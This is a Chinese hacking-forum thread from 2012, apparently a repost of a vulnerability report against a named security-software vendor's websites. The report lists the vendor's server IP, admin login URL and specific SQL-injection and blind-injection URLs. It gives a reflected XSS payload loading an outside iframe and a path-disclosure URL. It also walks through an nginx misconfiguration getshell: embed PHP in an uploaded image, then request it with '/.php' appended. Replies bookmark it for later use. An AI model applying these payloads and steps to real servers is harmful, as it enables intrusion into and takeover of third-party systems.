找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1349|回复: 2

安全管家网站多个注射+nginx配置不当漏洞及修复

[复制链接]
已绑定手机

195

主题

71

回帖

979

牛毛

一级牛人

积分
979
QQ
 楼主| 发表于 2012-6-26 13:00:56 | 显示全部楼层 |阅读模式 来自 北京市
简要描述:
多个注射+nginx配置不当,直接getshell
详细说明:
117.135.130.111 -[5] - nginx/0.9.3
http://bbs.anguanjia.com
http://bbs.aqgj.cn
http://wap.anguanjia.com
http://www.anguanjia.com
http://www.anquanguanjia.com
后台
http://www.aqgj.cn/admin/login.htm
官网注入
http://www.aqgj.cn/job_content.php?id=15
http://www.aqgj.cn/plug/search_cont.php?id=19
盲注
http://www.aqgj.cn/countfriendlink.php?id=58&link=
搜索反射xss (顺便提提,可以忽略)
http://www.aqgj.cn/plug/search.php?key=%3Ciframe%20width=800px%20height=600px%20src=http://gesong.org%20%3E%3C/iframe%3E
WAP页面N个注射
http://m.aqgj.cn/wap/?a=info&id=75&m=Soft&t=x
http://m.aqgj.cn/wap/?a=down&id=254&m=Soft&softid=75&t=x
http://m.aqgj.cn/wap/?m=Soft&stid=5&t=x
路径 (不可避免,php容错关不关都可以)
http://bbs.aqgj.cn/uc_server/control/admin/db.php
- /data/nginx/html/bbs/uc_server/control/admin/db.php
还有一个nginx配置不当 (都在一个服务器,果断全军覆没)
http://bbs.aqgj.cn/static/image/common/logo.png/.php
上传任意图片,插入php代码
<?PHP fputs(fopen('x.php','w'),'');?>
然后访问图片/.php,直接getshell
漏洞证明:
http://www.aqgj.cn/test.txt
0.jpg
1.jpg
2.jpg
修复方案:
后台潜了吧,露出来多危险。

5

主题

1621

回帖

1508

牛毛

二级牛人

积分
1508
发表于 2012-9-19 23:53:39 | 显示全部楼层 来自 湖北省随州市
好东东,一定要支持
收藏备用

139

主题

234

回帖

94

牛毛

初生牛犊

积分
94
发表于 2012-9-21 11:09:28 | 显示全部楼层 来自 重庆市
本地的会不会丢失???
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-26 02:12 , Processed in 0.200589 second(s), 47 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表